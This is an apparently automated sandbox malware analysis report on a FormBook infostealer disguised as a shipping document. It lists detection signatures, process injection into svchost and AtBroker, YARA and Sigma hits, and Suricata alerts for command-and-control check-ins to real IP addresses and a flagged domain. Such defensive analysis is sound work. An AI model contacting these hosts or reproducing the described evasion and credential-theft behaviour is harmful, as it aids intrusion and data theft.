Edit tour

Windows Analysis Report
shipping doc_20241111.exe

Overview

General Information

Sample name:	shipping doc_20241111.exe
Analysis ID:	1553447
MD5:	a3881d5172648b6020efe54076616fee
SHA1:	2417a1b17e97fd2d9f02c46dd028ff10085ec696
SHA256:	219b2f19475b0ba36726568f9dd52320c1c44f24c9e3ac018c0742967e157ba2
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

shipping doc_20241111.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\shipping doc_20241111.exe" MD5: A3881D5172648B6020EFE54076616FEE)

svchost.exe (PID: 7028 cmdline: "C:\Users\user\Desktop\shipping doc_20241111.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

DvhYoKnukykMD.exe (PID: 5580 cmdline: "C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

AtBroker.exe (PID: 6256 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)

DvhYoKnukykMD.exe (PID: 5608 cmdline: "C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5432 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.2540000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.2540000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\shipping doc_20241111.exe", CommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", ParentImage: C:\Users\user\Desktop\shipping doc_20241111.exe, ParentProcessId: 6976, ParentProcessName: shipping doc_20241111.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", ProcessId: 7028, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\shipping doc_20241111.exe", CommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", ParentImage: C:\Users\user\Desktop\shipping doc_20241111.exe, ParentProcessId: 6976, ParentProcessName: shipping doc_20241111.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping doc_20241111.exe", ProcessId: 7028, ProcessName: svchost.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T08:31:13.022041+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-11T08:31:51.251283+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.4	49742	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T08:31:21.491778+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49736	156.234.28.94	80	TCP
2024-11-11T08:31:45.158192+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49740	38.88.82.56	80	TCP
2024-11-11T08:31:58.357109+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49771	3.33.130.190	80	TCP
2024-11-11T08:32:12.134100+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49881	194.58.112.174	80	TCP
2024-11-11T08:32:25.499026+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49986	3.33.130.190	80	TCP
2024-11-11T08:32:39.842290+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50022	104.21.14.183	80	TCP
2024-11-11T08:32:53.757114+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50026	67.223.117.142	80	TCP
2024-11-11T08:33:07.069675+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50030	3.33.130.190	80	TCP
2024-11-11T08:33:20.802632+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50034	113.20.119.31	80	TCP
2024-11-11T08:33:34.992839+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50038	47.129.103.185	80	TCP
2024-11-11T08:33:48.382167+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50042	38.47.237.27	80	TCP
2024-11-11T08:34:02.833928+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50046	206.119.81.36	80	TCP
2024-11-11T08:34:16.272379+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50050	142.250.184.211	80	TCP
2024-11-11T08:34:29.709427+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50054	3.33.130.190	80	TCP
2024-11-11T08:34:43.740298+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50058	154.23.184.95	80	TCP
2024-11-11T08:34:57.229452+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50062	185.27.134.144	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-11T08:31:37.323191+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49737	38.88.82.56	80	TCP
2024-11-11T08:31:39.884168+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49738	38.88.82.56	80	TCP
2024-11-11T08:31:42.477677+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49739	38.88.82.56	80	TCP
2024-11-11T08:31:50.716807+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49741	3.33.130.190	80	TCP
2024-11-11T08:31:53.258317+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49743	3.33.130.190	80	TCP
2024-11-11T08:31:55.807075+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49750	3.33.130.190	80	TCP
2024-11-11T08:32:04.468216+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49817	194.58.112.174	80	TCP
2024-11-11T08:32:07.050386+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49841	194.58.112.174	80	TCP
2024-11-11T08:32:09.590447+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49860	194.58.112.174	80	TCP
2024-11-11T08:32:17.737155+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49926	3.33.130.190	80	TCP
2024-11-11T08:32:20.277001+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49944	3.33.130.190	80	TCP
2024-11-11T08:32:22.945171+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49965	3.33.130.190	80	TCP
2024-11-11T08:32:32.108767+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	104.21.14.183	80	TCP
2024-11-11T08:32:34.662021+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50020	104.21.14.183	80	TCP
2024-11-11T08:32:37.275494+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50021	104.21.14.183	80	TCP
2024-11-11T08:32:46.152936+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50023	67.223.117.142	80	TCP
2024-11-11T08:32:48.708858+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	67.223.117.142	80	TCP
2024-11-11T08:32:51.225117+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	67.223.117.142	80	TCP
2024-11-11T08:32:59.243532+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50027	3.33.130.190	80	TCP
2024-11-11T08:33:01.805183+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	3.33.130.190	80	TCP
2024-11-11T08:33:04.336605+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	3.33.130.190	80	TCP
2024-11-11T08:33:13.085137+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50031	113.20.119.31	80	TCP
2024-11-11T08:33:15.617147+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	113.20.119.31	80	TCP
2024-11-11T08:33:18.177605+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	113.20.119.31	80	TCP
2024-11-11T08:33:27.396358+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50035	47.129.103.185	80	TCP
2024-11-11T08:33:29.880771+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50036	47.129.103.185	80	TCP
2024-11-11T08:33:32.583880+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	47.129.103.185	80	TCP
2024-11-11T08:33:40.749768+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50039	38.47.237.27	80	TCP
2024-11-11T08:33:43.291959+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50040	38.47.237.27	80	TCP
2024-11-11T08:33:45.837304+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50041	38.47.237.27	80	TCP
2024-11-11T08:33:55.053184+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50043	206.119.81.36	80	TCP
2024-11-11T08:33:57.771422+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50044	206.119.81.36	80	TCP
2024-11-11T08:34:00.209200+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50045	206.119.81.36	80	TCP
2024-11-11T08:34:08.671334+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50047	142.250.184.211	80	TCP
2024-11-11T08:34:11.163664+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50048	142.250.184.211	80	TCP
2024-11-11T08:34:13.715732+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50049	142.250.184.211	80	TCP
2024-11-11T08:34:22.068858+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50051	3.33.130.190	80	TCP
2024-11-11T08:34:24.617760+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50052	3.33.130.190	80	TCP
2024-11-11T08:34:27.153277+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50053	3.33.130.190	80	TCP
2024-11-11T08:34:36.084085+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50055	154.23.184.95	80	TCP
2024-11-11T08:34:38.787149+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50056	154.23.184.95	80	TCP
2024-11-11T08:34:41.209018+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50057	154.23.184.95	80	TCP
2024-11-11T08:34:49.589931+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50059	185.27.134.144	80	TCP
2024-11-11T08:34:52.115377+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50060	185.27.134.144	80	TCP
2024-11-11T08:34:54.693499+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50061	185.27.134.144	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: shipping doc_20241111.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://00808.vip/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: shipping doc_20241111.exe	ReversingLabs: Detection: 50%
Source: shipping doc_20241111.exe	Virustotal: Detection: 36%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2540000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4109217815.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4108005033.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109259542.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765791231.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765495774.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4109168636.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765284786.0000000002540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4110795984.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipping doc_20241111.exe

Joe Sandbox ML: detected

Source: shipping doc_20241111.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DvhYoKnukykMD.exe, 00000002.00000000.1688135093.00000000007EE000.00000002.00000001.01000000.00000004.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4108006746.00000000007EE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1733401086.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733473220.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000003.1707007902.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000002.4108664369.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping doc_20241111.exe, 00000000.00000003.1662994380.0000000003960000.00000004.00001000.00020000.00000000.sdmp, shipping doc_20241111.exe, 00000000.00000003.1662770581.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1669582986.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1674699687.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.00000000047BE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1774797181.0000000004477000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1773026298.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.0000000004620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping doc_20241111.exe, 00000000.00000003.1662994380.0000000003960000.00000004.00001000.00020000.00000000.sdmp, shipping doc_20241111.exe, 00000000.00000003.1662770581.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1669582986.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1674699687.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1765520367.000000000329E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000002.4109445995.00000000047BE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1774797181.0000000004477000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1773026298.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4109445995.0000000004620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.4110035048.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4108398193.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000018E7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1733401086.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1733473220.0000000002A2B000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000003.1707007902.0000000000AF4000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000002.00000002.4108664369.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: AtBroker.exe, 00000003.00000002.4110035048.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4108398193.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2067710841.0000000018E7C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB68AD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00FB68AD
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB680C FindFirstFileW,FindClose,	0_2_00FB680C
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FACF94 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FACF94
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FAD2C7 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00FAD2C7
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB9560 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB9560
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB96BB SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00FB96BB
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FADADC lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00FADADC
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB9A49 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00FB9A49
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00FB5BB5 FindFirstFileW,FindNextFileW,FindClose,	0_2_00FB5BB5
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 3_2_004BC830 FindFirstFileW,FindNextFileW,FindClose,	3_2_004BC830

Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then xor eax, eax		3_2_004A9EE0
Source: C:\Windows\SysWOW64\AtBroker.exe	Code function: 4x nop then mov ebx, 00000004h		3_2_045204DF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 156.234.28.94:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49771 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49817 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 38.88.82.56:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49860 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49881 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49944 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49926 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49986 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 104.21.14.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 104.21.14.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 104.21.14.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 113.20.119.31:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 67.223.117.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 67.223.117.142:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 104.21.14.183:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 47.129.103.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 113.20.119.31:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 38.47.237.27:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 47.129.103.185:80
